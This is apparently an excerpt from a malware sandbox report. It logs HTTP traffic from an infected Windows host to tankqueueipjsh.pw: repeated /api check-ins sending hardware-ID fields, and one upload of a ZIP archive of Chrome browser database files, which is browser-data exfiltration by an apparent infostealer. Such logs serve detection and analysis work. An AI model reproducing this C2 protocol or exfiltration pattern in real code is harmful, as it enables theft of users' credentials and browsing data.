                                                                                                                                                                                                                                                                        Data Ascii: areCF-RAY: 8314e90fbebe1fd6-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:09.068449020 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        16192.168.2.550202104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:09.169394016 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:09.169576883 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:09.929826021 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:09 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=32jh37r5q202p06fbb47bftd2o; expires=Sun, 31 Mar 2024 07:21:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:09 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:09 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:09 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uXyPAIjReMRwoqQNLlXFr8XkuHDlTREqyQmCYWAKdrYULgnTgDQKFzSNsmGYJQUWC42XHi7EWCrcYxYOeSf%2BYIe5eoYpjXucDhzd34fPDaGz0r4SoeNsGD73Wd%2FTwWPdiwVkfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudf
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:09.929846048 CET118INData Raw: 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 31 32 38 65 36 66 35 38 32 34 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: areCF-RAY: 8314e9128e6f5824-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:09.929939985 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        17192.168.2.550203104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.032632113 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.032922029 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.385205030 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:10 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=9cj85scjna29g9hhgdniau4b5o; expires=Sun, 31 Mar 2024 07:21:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:10 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:10 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:10 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DGLcM%2Bd8%2Fi754OshsphqumOKHupMAAjRkTDHJjwKXukAm%2BVu3kRX0cvzLNDkTC58TBD2fw2J6TmptvrKtIbUg%2BN9jhxh5FP0oS0qU%2F5CAGL8k79JZaSWicWAmxHJXQaZdhVx0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server:
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.385265112 CET124INData Raw: 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 31 37 66 63 32 32 35 62 33 35 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: loudflareCF-RAY: 8314e917fc225b35-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.385301113 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        18192.168.2.550204104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.485246897 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.485502958 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.842056036 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:10 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=kstclblqqqqcjhk3v6o9c59r9b; expires=Sun, 31 Mar 2024 07:21:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:10 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:10 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:10 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gu6Z8OHX4gvqy3lNw4NOZyKsGHggF0V7XZBe5nFgBkLQ2nD2W3gIrCORvYFtNBCiULuwlIPvcdKGmtZfAwxGdkdbQ%2BzdEyALkVDIxsXu37NQw7Lk1h0ZSoaA1sQC%2B20JELShUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudf
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.842179060 CET118INData Raw: 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 31 61 63 62 34 63 35 61 35 65 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: areCF-RAY: 8314e91acb4c5a5e-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.842191935 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        19192.168.2.550205104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.942079067 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:10.942326069 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:11.301023960 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:11 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=csqnfbre8vt56kddkv0mu596kf; expires=Sun, 31 Mar 2024 07:21:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:11 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:11 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:11 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FSJOxfHJryWsICRMOP69gPa9uKtq62iNPScvJiIECKu3sOrTP7MG9vV0ydSkB3XX06zS9dT%2BaueenVX121N5Cpz7q2QzSSPqUnei%2F2kl3XmgOa8s2NcjNL%2F4yBRdQBFSRTmGCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: clou
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:11.301037073 CET120INData Raw: 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 31 64 61 66 31 62 30 35 62 39 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: flareCF-RAY: 8314e91daf1b05b9-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:11.301048040 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        20192.168.2.550206104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:11.642832041 CET337OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 19382
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:11.643207073 CET11628OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:11.737143993 CET1340OUTData Raw: dc cf e5 b0 8a 0b 85 af df 1e f0 6a f7 87 cf bd da 6d fb 0e bf ec e0 33 17 a9 5d 10 2a 8f d1 6e fe e1 31 64 57 4d cb 51 c2 55 ef 74 ba f1 ed c0 97 58 6f 44 59 dd a1 1a 1b 44 ae 55 3b 1c 19 1b 68 ab 65 a2 94 4d cb 6b 2e 8b 34 6a aa d6 e9 e5 e3 fe
                                                                                                                                                                                                                                                                        Data Ascii: jm3]*n1dWMQUtXoDYDU;heMk.4jaJR:|0kTN["Dfh\VB([Ma<qtKH^l<eriZRl|'X*'E2Cm}-l*jR[Q5Hwj
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:11.737708092 CET1340OUTData Raw: 76 84 39 7c 36 3c 06 3b ae ed ba 7e e7 7c 3f 89 89 11 ef c7 bb c6 eb 15 3b d2 3b 5e 9c 53 53 cf e1 ea 83 ef e5 24 65 f6 58 87 d0 11 3f 7c 5d f7 d0 d1 70 49 10 32 f7 05 f0 7f e5 e0 d3 0f 3c 3f ef af 6e fb 7e de d9 80 53 35 36 7f 1a 65 33 7c 2f 47
                                                                                                                                                                                                                                                                        Data Ascii: v9|6<;~|?;;^SS$eX?|]pI2<?n~S56e3|/Gc{sOpWSHd:GdJp6/Sh}<6wH\yR }` }` }` }>)~?
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:11.737715960 CET1340OUTData Raw: 7b 4a 27 8e 4a 6b 41 45 a8 6d cf db 5b d4 6d d4 4c 55 0f 15 7f e9 22 b3 9f 89 b5 64 d8 b4 52 75 6c ef 5d a6 cf f9 17 15 d3 ac d4 c8 27 5e c0 46 d5 ad 6f 19 2c b5 05 d5 26 37 ae ef c7 66 eb b7 d9 94 df 66 7f f0 5e 9f 2c bc 7f be 75 e6 55 c9 6b b4
                                                                                                                                                                                                                                                                        Data Ascii: {J'JkAEm[mLU"dRul]'^Fo,&7ff^,uUkGXy{\74:jaL*%Bobn-'4b i5cNLkl#6DD;Q~(6T^;tu}Z:iXLnFz\Q>@OfIs
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:11.737739086 CET2626OUTData Raw: 35 57 4c db c3 37 00 26 5b a9 c4 39 ee dd 61 ed 54 90 7b d4 72 71 47 eb f4 68 28 f2 48 12 cf 9d 3f 6a 39 b8 43 9a 67 c7 25 c9 17 a4 38 ce 4f f3 f2 38 3f 66 3c f0 3d 98 d4 82 5a ed 74 e9 3f 45 4c cf e4 64 3a 2f 67 b3 59 5a 9e 9e 14 8b f4 84 a4 45
                                                                                                                                                                                                                                                                        Data Ascii: 5WL7&[9aT{rqGh(H?j9Cg%8O8?f<=Zt?ELd:/gYZEJZA`Sk)R:.N"VpEp)9[k3>'`e? Uj+ HC2LIXsbDVI64"(c<mGhWM&3c)41iH;J]o%o
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:11.737771034 CET1432OUTData Raw: 50 4b 03 04 14 00 08 08 08 00 65 74 86 57 00 00 00 00 00 00 00 00 00 00 00 00 20 00 04 00 43 68 72 6f 6d 65 2f 44 65 66 61 75 6c 74 2f 42 72 6f 77 73 65 72 44 42 2f 4c 4f 47 2e 6f 6c 64 01 00 00 00 b5 8e b1 0e 82 30 14 45 77 bf e2 fd 00 d0 62 31
                                                                                                                                                                                                                                                                        Data Ascii: PKetW Chrome/Default/BrowserDB/LOG.old0Ewb1A:n]*>jBI[w'7'&2$",,c$#i(e5WrEB7s<Rxyi-37VH7pp*2\taMuW=xPK+pN
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:12.120620966 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:12 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=pf3ofitpfhhome8eqklep07i9d; expires=Sun, 31 Mar 2024 07:21:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:11 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:11 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:11 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nw%2BG29pdrffHbgCxro1sNGRMkzkaom46O27RDbcS5Xo%2BWALsZlxaivzCN%2BnHs1ked0Zhozhtj6GU%2FHRGGwUtdmyzjCjuUgQKHohZcnfeSNayTTJ9t0fN7ZcQ6WBb4o2iZdCs5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cl
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:12.120682955 CET117INData Raw: 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 32 32 30 62 38 36 36 66 64 33 2d 49 41 44 0d 0a 0d 0a 31 30 0d 0a 6f 6b 20 31 30 32 2e 31 36 35 2e 34 38 2e 38 33 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: udflareCF-RAY: 8314e9220b866fd3-IAD10ok 102.165.48.83
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:12.120748043 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        21192.168.2.550207104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:12.219468117 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:12.219721079 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:12.589037895 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:12 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=925379vbl9qh79nem09a9memk8; expires=Sun, 31 Mar 2024 07:21:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:12 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:12 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:12 GMT; Max-Age=5184000; path=/
